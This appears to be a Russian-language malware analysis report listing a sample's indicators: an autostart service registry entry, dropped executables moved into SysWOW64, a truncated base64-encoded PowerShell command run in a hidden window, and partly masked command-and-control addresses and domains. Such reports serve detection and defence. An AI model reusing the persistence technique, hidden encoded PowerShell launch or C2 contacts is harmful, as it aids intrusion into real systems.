Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\adsmsext] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\adsmsext] 'ImagePath' = '"%WINDIR%\SysWOW64\kbdgeoqw\adsmsext.exe"'
- 'adsmsext' "%WINDIR%\SysWOW64\kbdgeoqw\adsmsext.exe"
- 'adsmsext' %WINDIR%\SysWOW64\kbdgeoqw\adsmsext.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAFQALQBpAHQARQBNACAAdgBhAHIAaQBBAGIAbABFADoAOQByAEoAbwAgACgAWwBUAHkAcABFAF0AKAAiAHsANQB9AHsAMAB9AHsANAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBpAE8AJwAsACcAYwB0AG8Acg...
- %HOMEPATH%\iigg6pm\q3bywaw\z7fsmq.exe
- %WINDIR%\syswow64\kbdgeoqw\adsmsext.exe
- %HOMEPATH%\iigg6pm\q3bywaw\z7fsmq.exe в %WINDIR%\syswow64\kbdgeoqw\adsmsext.exe
- '45.##.226.117':443
- http://45.##.226.117:443/r9R8KV4HS/scOwe9Bh9rDVa/qsCwgDNS07hdu4WH/rRNDFkBCDOi/ via 45.##.226.117
- DNS ASK yo####ivatelife.com
- DNS ASK fi###ttrade.com
- DNS ASK as##q.xyz
- DNS ASK ar######tahighschool.com
- DNS ASK an#####ndfriends.com
- DNS ASK dm###inlaw.com
- '%HOMEPATH%\iigg6pm\q3bywaw\z7fsmq.exe'
- '%WINDIR%\syswow64\kbdgeoqw\adsmsext.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD UwBFAFQALQBpAHQARQBNACAAdgBhAHIAaQBBAGIAbABFADoAOQByAEoAbwAgACgAWwBUAHkAcABFAF0AKAAiAHsANQB9AHsAMAB9AHsANAB9AHsAMwB9AHsAMgB9AHsAMQB9ACIALQBmACAAJwBpAE8AJwAsACcAYwB0AG8Acg...' (со скрытым окном)